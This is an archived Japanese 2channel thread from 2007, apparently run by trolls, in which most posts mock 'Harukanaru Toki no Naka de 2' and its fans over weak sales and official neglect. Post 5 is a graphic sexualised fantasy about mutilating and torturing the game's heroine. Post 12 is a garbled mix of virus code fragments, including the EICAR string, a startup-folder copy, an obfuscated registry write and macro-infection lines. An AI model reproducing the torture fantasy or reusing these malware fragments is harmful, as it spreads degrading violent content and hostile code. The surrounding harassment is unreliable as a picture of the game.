2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

遙かなる時空の中で2その19

1 :名無しって呼んでいいか?:2007/07/25(水) 12:07:19 ID:???
遙かなる時空の中で2〜まとめサイト
ttp://www3.atwiki.jp/haruka2/
情報・攻略など。質問の前に目を通そう

【お約束】
sage進行、でもageてしまっても(・∀・)キニスンナ!
荒し、煽り、叩きは完全放置。
チャット状態は鯖負担になりますので控えましょう。
次スレは>>960を踏んだ人が立ててください。


2 :名無しって呼んでいいか?:2007/07/25(水) 12:09:42 ID:???
再録ウ゛ォーカルCD売り上げ(オリコン調べ)

ありあけの歌 9044枚(初週+2週)

八葉抄ウ゛ォーカルコレクション 6720枚(初週+2週)

夢の通ひ路 1460枚(初週のみ。翌週はランキング外落ち)

2 売 れ て ね ぇ wwwww


3 :名無しって呼んでいいか?:2007/07/25(水) 12:12:30 ID:???
CD売り上げ(オリコン調べ)

月のしずく 5308枚(初週+2週)

残照の栞 1121枚(初週のみ。翌週はランキング外落ち)

2 連 動 し て も 売 れ て ね ぇ wwwww

4 :名無しって呼んでいいか?:2007/07/25(水) 12:13:08 ID:???
ぱふ読者は遙か3ファン多いみたい。
毎月やってる好きなゲームベスト10の去年一年分を集計した
好きなゲームベスト10 2005 が先月号に載ってたんだけど
そのランキングでもFF、幻水抜いて遙か3が1位だったよ(・∀・)

ちなみに遙か1は6位、コルダは9位と健闘。遙か2はランキング外。

2 は ラ ン キ ン グ 外
相変わらず人気ねーなwwwww

5 :名無しって呼んでいいか?:2007/07/25(水) 12:14:04 ID:???
花梨たんの4本の手足を切り落として楽しいお喋り枕にしてみたのでおじゃる。( ゜
∀゜)
幼稚な精神にみあって成熟してない貧相な体はガリガリで
寝心地はちょっと悪いでおじゃる。(´ё`)

「その汚い頭どけてよ!」
「顔をこっちに向けないで、修行が足りないよ!」
「この借りは倍にして返すよ!」

応援台詞でお馴染花梨たんお得意の罵り文句に今日も癒されるのじゃ。( ´ー`)
y−〜〜
お礼に可愛い目玉を指でつまみ出すことにしたでおじゃる。

「キャァアアアアアアァ―――――――ッ!!」

これじゃ。まろが求めていたミラクルボイス。思わず射精しそうになるのを我慢しつつ
露出した眼球に軽く爪を立てるとこれまで以上の絶叫で応えてくれるのじゃ。
あ、花梨たん泡を吹いて失神してしまったでおじゃる。(;^_^A

今日はよく頑張ったのでこのままそっとしておくことにする。(・∀・)
全身を痙攣させながら眠りにつく花梨たん。
まろがいないと一日とて生きていけない花梨たん。
いつまでも、いつまでも大切に可愛がってあげるのじゃ!

6 :名無しって呼んでいいか?:2007/07/25(水) 12:15:36 ID:???
乙女ゲーム白書 年間ランキング
好きなゲームソフト部門TOP20

1位 遙か3
2位 十六夜記

3位 ラブレボ
4位 ときメモGS

5位 コルダ

6位 フルキス

7位 遙か1

8位 水の旋律
9位 フルキス2
10位 幕末恋華
11位 ラスエス

12位 迷宮

12位 王宮夜想曲
14位 Little Aid

15位 ネオアン

15位 うるクエ
17位 Yo-Jin-Bo

18位 アンジェリーク

18位 マイネ
18位 ファンタ2 ☆☆☆

ネオロマの中で2だけ入ってないwwwwwww

7 :名無しって呼んでいいか?:2007/07/25(水) 12:19:06 ID:???
ネオロマライブは遙1と3の曲しか歌われなかったwwww
2だけスルーwwwwwwww

8 :名無しって呼んでいいか?:2007/07/25(水) 12:23:43 ID:???
CDは1でボイカは3、今度の公式イベントでも
 2 だ け 華麗にスルーwwwwwwwww

9 :名無しって呼んでいいか?:2007/07/25(水) 12:24:55 ID:???
でも、じれっ隊は好き。

10 :名無しって呼んでいいか?:2007/07/25(水) 12:25:03 ID:???
DXの全サで3種類のグッズを作ったが1と3のキャラのグッズのみ。
3種類のグッズなのに2のグッズだけ無かったwww

11 :名無しって呼んでいいか?:2007/07/25(水) 12:27:24 ID:???
ネオロマライヴの開催記念CDでも2キャラスルーwww
各ネオロマから数キャラが出演するCDで
ネオロマンス作品が勢ぞろいしたCDと紹介されるも
遙2のキャラは出ていない

当然のようにネオロマライブで2の歌は歌われなかったw

12 :名無しって呼んでいいか?:2007/07/25(水) 18:43:11 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


13 :名無しって呼んでいいか?:2007/07/26(木) 20:43:04 ID:???
遙か2のOVAの音楽がNHKの陽炎の辻って時代劇でちょっとアレンジして使い回されてた。
作曲者が同じなら使い回しでも良いのかな
公式HPには書き下ろしで作って貰ったって書いてあるけど…

14 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 01:45:10 ID:???
>>13
またか。案でもそんなことあったな。

15 :名無しって呼んでいいか?:2007/07/30(月) 08:35:21 ID:???
最近2始めたんですけど工作員またデタwwww

16 :名無しって呼んでいいか?:2007/08/01(水) 12:29:33 ID:???
2関連のスレは工作員の「最近はじめたんですけど」ネタでしか
進まないからw話題ないしw


17 :名無しって呼んでいいか?:2007/08/02(木) 01:36:54 ID:???
総合で2スレのテンプレに付いて呼びかける。

どうでもいいので皆華麗にスルー。過疎避難所へは誰も来ず。

2日近く放置され、耐えられずチラ裏で自演が始まる。

乙女ゲ板から2厨撤退。携帯ゲ板に敗走。

過疎化が一層進む。

数日は中身のない乙コールを繰り返ししのぐ。

そろそろ乙コールも不自然になった頃「最近2始めたんですけど」
(「これから2を始めようと思うんだけど」のバージョン違いも有りww)工作員登場。

何も考えず携帯ゲ板に来たものの話題がないので、板違いのノベルやDLイベントの話を強引にする。

「デフォ名だと音声付けて欲しい」とか出るわけないノベル移植妄想を虚しく続けている2スレをよそに、コルダ2続編発売決定。

再び「最近2始めたんですけど」工作員登場。散々ガイシュツの攻略質問を今更する。 ←今ここ。

遙か3アニメ化正式情報発表。

活性化する3スレ。益々過疎る2スレ。

新作や派生ソフトの情報が出るたびにずっと他作品のターン。

出もしないノベル移植妄想も出尽くしたが、ソフトは永遠に出ない。

以下ループ

18 :名無しって呼んでいいか?:2007/08/04(土) 10:05:54 ID:WkqmkJvj
せっかく依頼出したのに、削除人はさくっとスルーwwww
前スレは削除されずに放置され、普通にdat落ち
2厨たん骨折り損でカワイソスwwww

> 25 名前: じゅうにん 投稿日: 2007/06/16(土) 15:03:48 HOST:i220-220-239-122.s02.a013.ap.plala.or.jp
> 削除対象アドレス:
>      http://game12.2ch.net/test/read.cgi/ggirl/1181359351/l50
>
> 削除理由・詳細・その他:
>      GL6. 連続投稿・重複
>      連続投稿・コピー&ペースト
>    
> よろしくお願いします


> 32 名前: 削除屋@六条 ★ [sage] 投稿日: 2007/07/20(金) 17:22:58 ID:???0
> ここまで対応です。
> 以下残したものを中心に。
>
> /1176621712/  ネタスレとして育っているので残します。
> /1165675899/  レスがなければdat落ちしますしあえて消すまでもないとして残します。
> /1176810347/  ネタスレとして残します。
> /1165994760/  話が脱線気味ですが話題の設定自体は板違いとも言えないので残します。
> /1173024614/  ネタスレとして残します。需要がなければ放置してdar落ちさせてください。
> /1175931031/  板趣旨に沿った使い方をすれば問題ないので残します。
> /1180099018/  判断に迷ったので残します。
> /1182423427/  判断に迷ったので残します。
> /1170846787/  ゲームの話もしているので様子見します。
> /1182676847/  板趣旨から外れさえしなければ期待込みでもいいような。(GL5について)
>
>
> 移動・停止向きと思われるので判断よろしくおねがいします。
> ─────────────────────────────────────
> → ゴミ箱
> http://game12.2ch.net/test/read.cgi/ggirl/1159336110/ >>24
> http://game12.2ch.net/test/read.cgi/ggirl/1182353903/ >>26
> http://game12.2ch.net/test/read.cgi/ggirl/1179616777/ >>27
> http://game12.2ch.net/test/read.cgi/ggirl/1181137009/ >>29 移動先に総合スレあり
>
> → 停止向き
> http://game12.2ch.net/test/read.cgi/ggirl/1184224499/ >>31
> ─────────────────────────────────────


19 :名無しって呼んでいいか?:2007/08/07(火) 10:48:32 ID:???
2厨必死だなwwww

20 :名無しって呼んでいいか?:2007/08/09(木) 21:15:13 ID:???
総合で2スレのテンプレに付いて呼びかける。

どうでもいいので皆華麗にスルー。過疎避難所へは誰も来ず。

2日近く放置され、耐えられずチラ裏で自演が始まる。

乙女ゲ板から2厨撤退。携帯ゲ板に敗走。

過疎化が一層進む。

数日は中身のない乙コールを繰り返ししのぐ。

そろそろ乙コールも不自然になった頃「最近2始めたんですけど」
(「これから2を始めようと思うんだけど」のバージョン違いも有りww)工作員登場。

何も考えず携帯ゲ板に来たものの話題がないので、板違いのノベルやDLイベントの話を強引にする。

「デフォ名だと音声付けて欲しい」とか出るわけないノベル移植妄想を虚しく続けている2スレをよそに、コルダ2続編発売決定。

再び「最近2始めたんですけど」工作員登場。散々ガイシュツの攻略質問を今更する。 ←今ここ。

遙か3アニメ化正式情報発表。

活性化する3スレ。益々過疎る2スレ。

新作や派生ソフトの情報が出るたびにずっと他作品のターン。

出もしないノベル移植妄想も出尽くしたが、ソフトは永遠に出ない。

以下ループ

21 :名無しって呼んでいいか?:2007/08/15(水) 20:54:41 ID:???
>2の人形って出てる?
>欲しくて検索したら1と3は見つかったんだけど…

>>208
>2だけ出てない。1の後2はすっとばして現在3が発売中。

派生ソフトもグッズもすっかり2はスルーで1→3の流れがデフォだなwwww

22 :名無しって呼んでいいか?:2007/08/15(水) 23:14:53 ID:???
肥だってボランティアでやってるわけじゃないんだから
まったく売れる見込みの無い物出すほど馬鹿じゃないだろう

23 :名無しって呼んでいいか?:2007/08/16(木) 11:34:51 ID:???
漫画の全プレでもわざわざ3種類グッツ出しておきながら
1と3のグッツだけなのにw3種類なのに2だけスルーwwww

24 :名無しって呼んでいいか?:2007/08/17(金) 08:36:26 ID:???
>>23
そりゃ、応募する人間が少ないと雑誌側も損するからだろ
全プレってのは応募するためにその雑誌買う人間を
釣る為にやってるんだから

25 :名無しって呼んでいいか?:2007/08/17(金) 09:48:53 ID:???
そうそう2のグッズに応募するヤシなんかいないから
白泉も制作費をドブに捨てるような事はしないw
肥からもスルー、白泉からもスルーな2wwww

26 :名無しって呼んでいいか?:2007/08/17(金) 13:52:36 ID:???
コーエーからもスルー
白泉からもスルー
アニメイトからもスルー
2は常にどこからも総スルーwwwwww

27 :名無しって呼んでいいか?:2007/08/18(土) 01:32:16 ID:???
構ってくれるのはおかしな粘着タンだけだもんねw
いつもありがとうwwww

28 :名無しって呼んでいいか?:2007/08/18(土) 04:09:29 ID:???
久々に覗きにきたけど
粘着タンはあいかわらず2大好きなんだねw
毎日暑いのにご苦労様ですwww

29 :名無しって呼んでいいか?:2007/08/18(土) 12:02:05 ID:???
>>21
もうすぐそれにテレビアニメも加わりますな
いくら黒歴史の2とはいえここまで徹底的に1→3だとちょっと可哀想wwwww

30 :名無しって呼んでいいか?:2007/08/18(土) 12:26:12 ID:???
2厨涙目wwww

31 :名無しって呼んでいいか?:2007/08/20(月) 20:48:37 ID:???
最近始めました工作員またデタ!wwww

32 :名無しって呼んでいいか?:2007/08/20(月) 22:01:15 ID:???
ここってヲチスレなの?
どこのスレの話題なのかさっぱりわからん。

33 :名無しって呼んでいいか?:2007/08/26(日) 11:42:40 ID:???
漫画では1と3は神子が出てるのに、2だけブサイク神子が出てないw
水野透子は花梨をスルーwwww
>>21
世間からもスルーされてる

34 :名無しって呼んでいいか?:2007/09/02(日) 12:13:55 ID:???
不人気仲間のコルダですら続編も派生出してもらえるのになw
コルダはもう、人気あるかw2と違ってwwww

35 :名無しって呼んでいいか?:2007/09/05(水) 05:58:34 ID:???
>遙かなる時空の中で2  アートカード&ぷくぷくシール \1,000(税込)

次のフェスタで売れ残り特典の在庫処分セール再びwwwww



36 :名無しって呼んでいいか?:2007/09/05(水) 09:47:46 ID:???
PS2版特典のクリアカードも余らせて後からバラ売りしたんだよな

  ま た か よww

37 :名無しって呼んでいいか?:2007/09/09(日) 12:17:48 ID:???
2そのものが、売れ残り投げ売りセットとして他のゲームと一緒に
安売りされてたっけw
1と3はイベントの前に舞台とアニメが決まったけど2はスルー

38 :名無しって呼んでいいか?:2007/09/09(日) 13:52:20 ID:???
2は設定壊されてない、と2厨が必死で舞台化アニメ化決定の1と3
スレでほざいていたが、単純に公式からスルーされてるだけだろw
あげく、1や3の続編で思いっきり無かったことにされてるしなw2
何も出してもらってないのにねw

39 :名無しって呼んでいいか?:2007/09/09(日) 22:02:55 ID:???
派生展開してもらえなくても、八葉抄と3というゲーム続編で
十分設定壊されてなかったことにされてる2バロスwwww

40 :名無しって呼んでいいか?:2007/09/10(月) 01:51:56 ID:???
まだつづけるのね

41 :名無しって呼んでいいか?:2007/09/10(月) 09:35:53 ID:???
それより関連スレの萎え祭に便乗して、それならノベルの方がマシ
ノベルは結構良かったとドサクサに紛れて糞ノベルのイメージアップ工作してるつもりの
2厨の必死さに泣けたw
カニメが出ようと急に糞ノベルの出来が良くなるわけじゃない糞ノベルは糞ノベルだろ


42 :名無しって呼んでいいか?:2007/09/10(月) 22:17:04 ID:???
1は舞台化、3はテレビアニメ化でまた派生商品が沢山出るだろうけど
黒歴史でなかったことにされてる2だけはスルーwwwww

43 :名無しって呼んでいいか?:2007/09/16(日) 11:32:17 ID:???
豚切りごめん
あのさ、工作員wとかじゃなくて、懐かしさで引っ張り出して
2をやってるんだけど、音声がほとんどついてなくて妙に静かなのは
仕様ですか?こんなだったっけ?
ボイスありにしてるのになんか寂しいなんだぜ…

44 :名無しって呼んでいいか?:2007/09/18(火) 03:05:29 ID:???
>>43
自分も始めあまりの声なしに(´・ω・`)だったけど
いきなり声付きでイベントきた時に妙に萌えた。つか忘れかけててびっくりしたw
以来2のボイスはご祝儀的不意打ち萌え仕様と思ってるw

45 :43:2007/09/18(火) 12:34:24 ID:???
>>44
ありがとう!
PS2の故障を疑ってたんだけど、元々ほとんど声ついてないんだね
確かに不意打ちされたw そして本気でビビったw

46 :名無しって呼んでいいか?:2007/09/18(火) 22:56:18 ID:???
1(八葉抄)、3に比べて2だけボイス少ないのは仕様

47 :名無しって呼んでいいか?:2007/09/18(火) 23:16:45 ID:???
んでも2、語りイベントに入ると結構長めだよね。
3やってないからわかんないけど八葉抄でもこんくらいイベントん時語って欲しいなー
八葉抄や舞一夜で慣れちゃってたから2でも戦闘ん時に応援の声は欲しかったけどね。

48 :名無しって呼んでいいか?:2007/09/18(火) 23:34:20 ID:???
恋愛イベントのテキスト量なら八葉抄と2は殆んど変わらないが?

49 :名無しって呼んでいいか?:2007/09/19(水) 00:02:58 ID:???
盤上遊戯はフルボイスなんだよなぁ
2でも、いつか盤上遊戯2が出ると
信じていた時期が私にもありましたorz

50 :名無しって呼んでいいか?:2007/09/19(水) 00:15:15 ID:???
>>48
え。そうだった?あまりのボイスなしに錯覚したかwwそれが作戦だなw

51 :名無しって呼んでいいか?:2007/09/23(日) 02:16:28 ID:???
総合で2スレのテンプレに付いて呼びかける。

どうでもいいので皆華麗にスルー。過疎避難所へは誰も来ず。

2日近く放置され、耐えられずチラ裏で自演が始まる。

乙女ゲ板から2厨撤退。携帯ゲ板に敗走。

過疎化が一層進む。

数日は中身のない乙コールを繰り返ししのぐ。

そろそろ乙コールも不自然になった頃「最近2始めたんですけど」
(「これから2を始めようと思うんだけど」のバージョン違いも有りww)工作員登場。

何も考えず携帯ゲ板に来たものの話題がないので、板違いのノベルやDLイベントの話を強引にする。

「デフォ名だと音声付けて欲しい」とか出るわけないノベル移植妄想を虚しく続けている2スレをよそに、コルダ2続編発売決定。

再び「最近2始めたんですけど」工作員登場。散々ガイシュツの攻略質問を今更する。

遙か3アニメ化正式情報発表。

色々な意味で活性化する3スレ。益々過疎る2スレ。 ←今ここ

新作や派生ソフトの情報が出るたびにずっと他作品のターン。

出もしないノベル移植妄想も出尽くしたが、ソフトは永遠に出ない。

以下ループ

52 :名無しって呼んでいいか?:2007/09/23(日) 11:18:33 ID:???
無印→盤上→八葉抄→舞一夜や3→十六夜→迷宮が
発売されるまでの期間を考えれば公式が2では何も出す
つもりがないって事ぐらいわかるだろww
何も出てないのに設定破壊されて公式からなかったこと扱い
され続けてる2哀れwwww

53 :名無しって呼んでいいか?:2007/09/23(日) 13:07:19 ID:???
>>52
別に続編出て欲しいとかも思わないけど
なんでそんな自分でいうところの空気な2に、いっつも必死なのか不思議なんだけど。
楽しいの?

54 :名無しって呼んでいいか?:2007/09/23(日) 15:44:11 ID:???
DSででないかなぁ。

と淡い気体を捨てられない俺参上

55 :名無しって呼んでいいか?:2007/09/24(月) 00:34:55 ID:???
出ないよ

56 :名無しって呼んでいいか?:2007/09/24(月) 01:19:39 ID:???
スルー
2の話題は携帯ゲーム板でどぞ

57 :名無しって呼んでいいか?:2007/09/25(火) 01:59:40 ID:???
6年も放置されてるのに、まだ気体できるとは奇特な人だwwwww

58 :名無しって呼んでいいか?:2007/09/28(金) 00:13:33 ID:???



ここは荒らしが建てたスレです

普通に遙か2の話がしたい人はこちらへどうぞ


【PSP】遙かなる時空の中で2
http://game11.2ch.net/test/read.cgi/handygame/1182060797/


迷い込んできた人のために一応誘導
一回くらいはしといた方がいいよね





59 :名無しって呼んでいいか?:2007/09/29(土) 01:32:40 ID:???
舞一夜舞台化の次はいよいよ2が舞台化か〜楽しみだぜ!

60 :名無しって呼んでいいか?:2007/09/30(日) 12:10:51 ID:???
夏のイベントでありとあらゆる形で2だけ公式からスルー
今度のイベントでは2キャラも出る!とはしゃいだ2厨だったが
舞一夜の舞台化3のアニメ化と2に話題はなかった

61 :名無しって呼んでいいか?:2007/09/30(日) 17:57:01 ID:???
うんうん、そうだね。
ところでそろそろ>>53の質問に答えてほしいんだけどw

62 :名無しって呼んでいいか?:2007/09/30(日) 22:52:24 ID:???
乙女ゲーム白書 年間ランキング
2007年度版好きなゲームソフト部門TOP20

1位 緋色の欠片

2位 遙か3

3位 ときメモGS2

4位 コルダ

5位 ラブレボ

6位 コルダ2

7位 ときメモGS

8位 遙か1

9位 ハトアリ
10位 マメプリ

11位 十六夜記

12位 アラロス

13位 舞一夜

14位 Vitamin X
15位 恋華
16位 水の旋律2
17位 Yo-Jin-Bo
17位 UTM
19位 ときメモGSDS
19位 フルキス

>>6の2006年度版も、今年度版も遙かの中で2だけ入ってないwwwwwww

63 :名無しって呼んでいいか?:2007/10/03(水) 18:07:34 ID:???
去年圏外だったものが、派生も出ずスルーされてるのに今年突然入るわけないww
落ち目な2は何年経っても落ち目

64 :名無しって呼んでいいか?:2007/10/07(日) 10:28:08 ID:???
もし発売した時から人気があれば1や3みたいにどんどん
派生や続編でるよなw最初から不人気で不評の失敗作。

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)